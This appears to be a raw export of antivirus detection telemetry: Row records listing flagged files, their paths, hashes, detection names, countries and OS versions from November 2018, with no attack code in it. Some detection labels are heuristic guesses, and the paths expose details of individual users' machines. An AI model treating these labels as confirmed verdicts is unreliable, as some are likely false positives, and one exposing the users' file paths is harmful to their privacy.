  Row(detection=Row(filename='avscan-20181102-052901-2cf190d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052901-2CF190D6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061044-00c684a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061044-00C684A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054924-062ac1c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054924-062AC1C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055101-3f81a146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055101-3F81A146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053545-1e087f05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053545-1E087F05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062455-fc5afe7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062455-FC5AFE7D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054656-ad7125c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054656-AD7125C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052125-1ce7ef3c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052125-1CE7EF3C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062047-682bfc61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062047-682BFC61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061132-1d4baeca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061132-1D4BAECA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053014-58802cd4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053014-58802CD4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061004-e9149444', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061004-E9149444', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060948-df9846fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060948-DF9846FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051216-d62e8eee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051216-D62E8EEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T09:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050503-d3f87a3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050503-D3F87A3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051130-ba882b9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051130-BA882B9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052422-866efbbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052422-866EFBBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062118-7a89ce61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062118-7A89CE61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050549-ef77f196', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050549-EF77F196', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062004-4e90c289', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062004-4E90C289', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:06:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T06:56:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052301-5674a466', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052301-5674A466', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060502-351df594', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060502-351DF594', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052233-45a74efc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052233-45A74EFC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082615-3f600acd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5930385\\AVSCAN-20181102-082545-2594C732\\AVSCAN-20181102-082615-3F600ACD', filesize=176000, name='HTML/Crypted.Gen.#M1.#R1'), hash='747fc452007f8aaa5f79d54c7b4daa36da7455fc6854331b54d07481f3da55bf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054134-ed88135c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054134-ED88135C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062140-88232157', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062140-88232157', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:00:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062403-dd49890d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062403-DD49890D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055137-55762190', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055137-55762190', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055707-19bc3d2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055707-19BC3D2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:42:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051400-142a7107', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051400-142A7107', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050804-3ff1c997', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050804-3FF1C997', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lemburan 2014.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\LEMBURAN 2014\\LEMBURAN 2014.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155258-a3140821', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155258-A3140821', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151957-13b98cf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151312-DB3E0F68\\AVSCAN-20181101-151957-13B98CF2', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T18:44:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rpo3jur', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RPO3JUR', filesize=64000, name='VBA/Dldr.Agent.pazys.#M1.#R1'), hash='406187f465c797b693447ac8993fc4b5c786ecd1d1057f9b5f53bd82b3224ef3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151947-12466a4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151340-DF30F2CA\\AVSCAN-20181101-151947-12466A4A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T15:22:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhbfcf.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHBFCF.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='k3 dan lingkungan hidup.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\UU K3 DAN LINGKUNGAN HIDUP\\K3 DAN LINGKUNGAN HIDUP.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155235-9f4a62bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155235-9F4A62BB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3242375\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='g100canon.exe', filepath='E:\\DCIM\\g100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-01T11:47:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ub 40.exe', filepath='D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe198_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe198 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:23:59Z'), dt=datetime.date(2018, 11, 1)),
